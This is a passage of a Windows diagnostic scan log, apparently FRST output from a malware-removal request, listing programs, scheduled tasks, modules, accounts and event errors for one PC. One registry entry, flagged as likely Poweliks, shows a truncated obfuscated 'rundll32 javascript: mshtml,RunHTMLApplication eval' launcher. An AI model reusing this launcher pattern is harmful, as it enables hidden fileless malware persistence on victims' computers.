HP Officejet Pro 8500 A910 Product Improvement Study (HKLM\...\{963EF6DD-DE6B-43D8-A2AC-9217FD39958F}) (Version: 22.0.334.0 - Hewlett-Packard Co.)
HP Update (HKLM-x32\...\{787D1A33-A97B-4245-87C0-7174609A540C}) (Version: 5.002.005.003 - Hewlett-Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4 - HP)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - Intel Corporation)
Intel® Management Engine Interface (HKLM\...\HECI) (Version:  - Intel Corporation)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version:  - )
Intel® PROSet/Wireless WiFi Software (HKLM\...\{CCAFF072-4DDB-4846-963D-15F02A8E9472}) (Version: 13.00.0000 - Intel Corporation)
Intel® Active Management Technology (HKLM\...\MESOL) (Version:  - Intel Corporation)
InterVideo WinDVD 8 (HKLM-x32\...\InstallShield_{20471B27-D702-4FE8-8DEC-0702CC8C0A85}) (Version: 8.0.20.129 - InterVideo Inc.)
InterVideo WinDVD 8 (x32 Version: 8.0.20.129 - InterVideo Inc.) Hidden
iTunes (HKLM\...\{B8BA155B-1E75-405F-9CB4-8A99615D09DC}) (Version: 11.1.5.5 - Apple Inc.)
Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lenovo Fingerprint Software (HKLM\...\{2ED326C9-A4E6-4884-B3F0-9A6CFB0A1141}) (Version: 3.3.0.50 - AuthenTec, Inc.)
Lenovo Patch Utility 64 bit (Version: 1.4.0.4 - Lenovo Group Limited) Hidden
Lenovo Power Management Driver (HKLM\...\Power Management Driver) (Version: 1.67.04.05 - )
Lenovo System Interface Driver (HKLM\...\LENOVO.SMIIF) (Version: 1.05 - )
Lenovo System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 5.06.0016 - Lenovo)
Lenovo Welcome (HKLM-x32\...\Lenovo Welcome_is1) (Version: 2.0.020.0 - Lenovo)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Message Center Plus (HKLM-x32\...\{FD331A3B-F7A5-4C31-B8D4-DF413C85AF7A}) (Version: 2.0.0012.00 - Lenovo Group Limited)
Metric Collection SDK (x32 Version: 1.1.0005.00 - Lenovo Group Limited) Hidden
Metric Collection SDK 35 (x32 Version: 1.2.0001.00 - Lenovo Group Limited) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2003 Web Components (HKLM-x32\...\{90A40409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office 2007 Primary Interop Assemblies (HKLM-x32\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISER) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM-x32\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Office Small Business Connectivity Components (HKLM-x32\...\{A939D341-5A04-4E0A-BB55-3E65B386432D}) (Version: 2.0.7024.0 - Microsoft Corporation)
Microsoft Research AutoCollage Touch 2009 (HKLM-x32\...\{1F8DA253-3C27-4B01-A63A-BA3533120833}) (Version: 2.00.2009 - Microsoft Research)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM-x32\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server Native Client (HKLM\...\{9ACF3FDB-C8E6-444C-8C64-13A221F7BFFD}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM-x32\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{B636C9B9-A3F2-4DCE-ADCC-72E095018385}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM\...\{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Mobile Broadband Connect (HKLM-x32\...\{5C111F14-D9BE-459D-B0B6-B4D082F03749}) (Version: 3.5.0006 - Lenovo)
Mozilla Firefox 22.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 22.0 (x86 en-US)) (Version: 22.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 22.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB973685) (HKLM-x32\...\{859DFA95-E4A6-48CD-B88E-A3E483E89B44}) (Version: 4.30.2107.0 - Microsoft Corporation)
On Screen Display (HKLM\...\OnScreenDisplay) (Version: 6.73.00 - )
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.8 - Google, Inc.)
Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 6.66.3 - Lenovo Group Limited)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Registry Patch to Enable Maximum Power Saving on WiFi Adapters for Windows 7 (HKLM\...\EnablePS) (Version: 1.00 - )
Rescue and Recovery (HKLM-x32\...\{B383F243-0ABC-4E56-AA30-923B8D85076E}) (Version: 4.30.0025.00 - Lenovo Group Limited)
RICOH R5U8xx Media Driver ver.3.64.02 (HKLM-x32\...\{59F6A514-9813-47A3-948C-8A155460CC2A}) (Version: 3.64.02 - RICOH)
Roxio Creator Business Edition (HKLM-x32\...\{537BF16E-7412-448C-95D8-846E85A1D817}) (Version: 10.3 - Roxio)
Sanction Online Synchronization (HKLM-x32\...\Sanction Online Synchronization) (Version: 2.8 - SanctionII)
SanctionII (HKLM-x32\...\{135129F1-D9BF-42F4-9AF6-C1F5B10C3646}) (Version: 2.9.0 - Verdict Systems)
SHAREit (HKLM-x32\...\SHAREit_is1) (Version: 2.1.4.0 - Lenovo Group Limited)
Skype™ 4.0 (HKLM-x32\...\{24D753CA-6AE9-4E30-8F5F-EFC93E08BF3D}) (Version: 4.0.227 - Skype Technologies S.A.)
Sonic CinePlayer Decoder Pack (x32 Version: 4.3.0 - Sonic Solutions) Hidden
Sonic Icons for Lenovo (HKLM-x32\...\{B334D9AE-1393-423E-97C0-3BDC3360E692}) (Version: 2.0.0 - Lenovo)
SyncUploader (HKLM-x32\...\SyncUploader_is1) (Version:  - Synchron Voice and Video, Inc.)
System Migration Assistant (HKLM-x32\...\{8A4DB1CA-8206-4ADC-805C-66ACF1611DA3}) (Version: 6.00.0009 - Lenovo Group Limited.)
ThinkPad Bluetooth with Enhanced Data Rate Software (HKLM\...\{9E9D49A4-1DF4-4138-B7DB-5D87A893088E}) (Version: 6.2.0.9600 - Broadcom Corporation)
ThinkPad FullScreen Magnifier (HKLM\...\ThinkPad FullScreen Magnifier) (Version: 2.41 - )
ThinkPad Modem Adapter (HKLM\...\CNXT_MODEM_HDA_HSF) (Version: 7.80.5.0 - Conexant Systems)
ThinkPad UltraNav Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.19.14 - )
ThinkPad UltraNav Utility (HKLM-x32\...\{17CBC505-D1AE-459D-B445-3D2000A85842}) (Version: 2.13.0 - Lenovo)
ThinkVantage Access Connections (HKLM-x32\...\{8E537894-A559-4D60-B3CB-F4485E3D24E3}) (Version: 6.21 - Lenovo)
ThinkVantage Active Protection System (HKLM\...\{46A84694-59EC-48F0-964C-7E76E9F8A2ED}) (Version: 1.79.00.03 - Lenovo)
ThinkVantage Communications Utility (HKLM\...\{88C6A6D9-324C-46E8-BA87-563D14021442}_is1) (Version: 2.11.0.0 - Lenovo)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
VD64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
Viewpoint Manager (Remove Only) (HKLM-x32\...\Viewpoint Manager) (Version:  - )
Viewpoint Toolbar (HKLM-x32\...\Viewpoint Toolbar) (Version:  - )
Visual C++ 8.0 Runtime Setup Package (x64) (HKLM-x32\...\{2FDBBCEA-62DB-45F4-B6E5-0E1FB2A1F29D}) (Version: 9.0.0.623 - AVG Technologies CZ, s.r.o.)
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player 1.1.11 (HKLM-x32\...\VLC media player) (Version: 1.1.11 - VideoLAN)
Webcam Video Capture 4.8.0 (HKLM-x32\...\Webcam Video Capture_is1) (Version:  - Webcam Simulator)
Windows Driver Package - AuthenTec Inc. (ATSwpWDF) Biometric  (07/07/2009 8.1.2.56) (HKLM\...\8E6CE26AD682E6D46DCCDD39CD93277A2EAF2449) (Version: 07/07/2009 8.1.2.56 - AuthenTec Inc.)
Windows Driver Package - Intel System  (06/04/2009 1.0.0.0002) (HKLM\...\E7B58217635B8F723D4744A328A4B3237DB35FA9) (Version: 06/04/2009 1.0.0.0002 - Intel)
Windows Driver Package - Lenovo 1.55 (08/18/2009 1.55) (HKLM\...\112AA64E0C8CC704E307FE914F7DEC1C0035598E) (Version: 08/18/2009 1.55 - Lenovo)
Windows Driver Package - Ricoh Company (rimsptsk) hdc  (09/03/2009 6.10.01.05) (HKLM\...\5F72B7FA1792CB768F6A46E18A9DAD0E1FE1C863) (Version: 09/03/2009 6.10.01.05 - Ricoh Company)
Windows Driver Package - Ricoh Company (rismxdp) hdc  (09/03/2009 6.10.01.05) (HKLM\...\1FBDB507F002A372EB195A0ACF6E2A2F9D34689E) (Version: 09/03/2009 6.10.01.05 - Ricoh Company)
Windows Driver Package - Ricoh Company MMC Host Controller (09/03/2009 6.10.01.05) (HKLM\...\D50474ACAF488895A3CE5D30373288EA6AD46EAA) (Version: 09/03/2009 6.10.01.05 - Ricoh Company)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)

==================== Restore Points  =========================

29-10-2014 15:14:51 Windows Update
29-10-2014 15:43:20 Removed AVG 2011
29-10-2014 15:47:21 Removed AVG 2011
29-10-2014 16:40:02 Installed AVG 2015
29-10-2014 16:40:39 Installed AVG 2015

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {10A8682B-DDFF-4C3F-94C8-6A7A09A3302A} - System32\Tasks\TVT\LenovoWERMonitor => C:\Program Files (x86)\Common Files\lenovo\SUP\sup_wermonitor_shim.exe [2014-09-01] ()
Task: {194D57F8-A314-4312-9BFC-D737D870ADCA} - System32\Tasks\Adobe online update program => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-08-21] (Adobe Systems Incorporated)
Task: {1A8F5B89-4B74-4727-9FF1-D36A55F8876D} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [2014-06-18] ()
Task: {30B5B2A6-F826-4565-92B4-8584E12E8F45} - System32\Tasks\TVT\ChangePWD => %RR%\rrcmd.exe
Task: {3844B652-7890-45EE-9DAB-B3EF1FBCD976} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe [2014-05-30] (Lenovo)
Task: {4B40D368-AC49-4DF8-8F12-D98D41F7BC6C} - System32\Tasks\TVT\LaunchRnR => %RR%\rrcmd.exe
Task: {4C89DECB-CFF0-49E1-9246-7A1F8D318912} - System32\Tasks\PCDEventLauncher => C:\Program Files\PC-Doctor\sessionchecker.exe
Task: {54736606-5030-4C93-9F54-7EF26EFA8ADF} - System32\Tasks\1014avUpdateInfo => C:\ProgramData\Avg_Update_1014av\1014av_AVG-Secure-Search-Update.exe
Task: {574D660D-F9DC-47FF-8ADE-A988EF49C894} - System32\Tasks\Java Update Scheduler => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2014-09-26] (Oracle Corporation)
Task: {5F681B2F-3464-4EC5-A163-3652DE9BF2F3} - System32\Tasks\Synaptics TouchPad Enhancements => \Program Files\Synaptics\SynTP\SynTPEnh.exe [2014-07-28] (Synaptics Incorporated)
Task: {5FB2CA78-42E5-4700-BF1C-63DE7D977FBB} - System32\Tasks\Message Center plus => C:\Program Files (x86)\Lenovo\Message Center Plus\MCPLaunch.exe [2009-05-28] ()
Task: {6A771AE3-C6D9-4DF2-82A8-2C91380924E2} - System32\Tasks\HP online update program => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [2010-03-12] (Hewlett-Packard)
Task: {733FF5EE-2271-4FB4-8543-C8B19A1E0A61} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2014-02-13] (Lenovo)
Task: {7F1B8DB2-F8ED-4F7C-94DF-5D944A62F08B} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PwmIdTsv.exe [2014-09-10] (Lenovo Group Limited)
Task: {9711155E-F609-4429-9770-97F4DF706211} - System32\Tasks\HPCustParticipation HP Officejet Pro 8500 A910 => C:\Program Files\HP\HP Officejet Pro 8500 A910\Bin\HPCustPartic.exe [2010-06-14] (Hewlett-Packard Co.)
Task: {A552459E-DED6-4831-BA38-64227F19A6C6} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-18] (Google Inc.)
Task: {CCE4B7E1-8686-4DAD-8B00-7457398BE82F} - System32\Tasks\DiskUpdate => C:\SWTOOLS\OSFIXES\DISKUPDT\DiskUpdate.exe [2009-02-09] ()
Task: {D03BED1A-E95C-4789-A641-D20C22D268FD} - System32\Tasks\TVT\UpdateRnR => %TVTCOMMON%\Scheduler\tvtsetsched.exe
Task: {D6FD3C29-DF71-4519-B595-2EE6BBD3963C} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-18] (Google Inc.)
Task: {EE7ADEAE-84E3-49E2-BBA6-54A8AE27C911} - System32\Tasks\Google Updater and Installer => C:\Users\Charles\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {F907CFFB-4805-4BBE-8877-7C9A90C1BEF2} - System32\Tasks\Divx online update program => C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [2013-08-28] ()
Task: {F9A775E6-F9B2-4A78-85FE-CDE4DB114C90} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2009-09-01 02:36 - 2009-09-01 02:36 - 00117760 _____ () C:\Windows\system32\DTS.exe
2009-09-21 18:04 - 2009-09-21 18:04 - 01501696 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2014-10-29 11:52 - 2014-10-29 11:51 - 00159768 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.10\loggingserver.exe
2009-12-02 13:59 - 2014-09-10 06:06 - 00104960 ____N () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL
2010-01-02 09:42 - 2010-01-02 09:42 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll
2009-07-01 21:54 - 2009-07-01 21:54 - 00173344 _____ () C:\Program Files\ThinkPad\Bluetooth Software\btkeyind.dll
2014-10-29 11:52 - 2014-10-29 11:51 - 03037208 _____ () C:\Program Files (x86)\AVG Web TuneUp\vprot.exe
2014-02-06 01:52 - 2014-02-06 01:52 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-02-06 01:52 - 2014-02-06 01:52 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2014-03-14 17:47 - 2014-03-14 17:47 - 00092504 _____ () C:\Program Files (x86)\Lenovo\Access Connections\AcWrpc.dll
2014-10-29 11:52 - 2014-10-29 11:51 - 00519704 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.10\log4cplusU.dll
2014-10-29 11:52 - 2014-10-29 11:51 - 01685528 _____ () C:\Program Files (x86)\AVG Web TuneUp\TBAPI.dll
2014-10-29 11:52 - 2014-10-29 11:51 - 40630296 _____ () C:\Program Files (x86)\AVG Web TuneUp\libcef.dll
2014-10-29 12:17 - 2014-10-29 12:17 - 00043008 _____ () c:\users\charles\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp2qaslf.dll
2013-08-23 14:01 - 2013-08-23 14:01 - 25100288 _____ () C:\Users\Charles\AppData\Roaming\Dropbox\bin\libcef.dll
2013-08-06 12:43 - 2013-08-06 12:43 - 00093696 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:40F038C5
AlternateDataStreams: C:\ProgramData\TEMP:C74D7A47

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-3094523011-22438472-3966868382-500 - Administrator - Disabled)
Charles (S-1-5-21-3094523011-22438472-3966868382-1003 - Administrator - Enabled) => C:\Users\Charles
Guest (S-1-5-21-3094523011-22438472-3966868382-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3094523011-22438472-3966868382-1005 - Limited - Enabled)

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (10/29/2014 00:01:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: avgui.exe, version: 15.0.0.5557, time stamp: 0x544024b3
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000000
Faulting process id: 0x1788
Faulting application start time: 0xavgui.exe0
Faulting application path: avgui.exe1
Faulting module path: avgui.exe2
Report Id: avgui.exe3

Error: (10/29/2014 10:45:58 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (10/29/2014 10:45:58 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (10/28/2014 11:52:37 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 21450

Error: (10/28/2014 11:52:37 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 21450

Error: (10/28/2014 11:52:37 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (10/28/2014 11:46:09 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.17116, time stamp: 0x4a5bc6b7
Faulting module name: jscript9.dll, version: 10.0.9200.17116, time stamp: 0x541cda0b
Exception code: 0xc0000005
Fault offset: 0x000b9def
Faulting process id: 0xc4c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

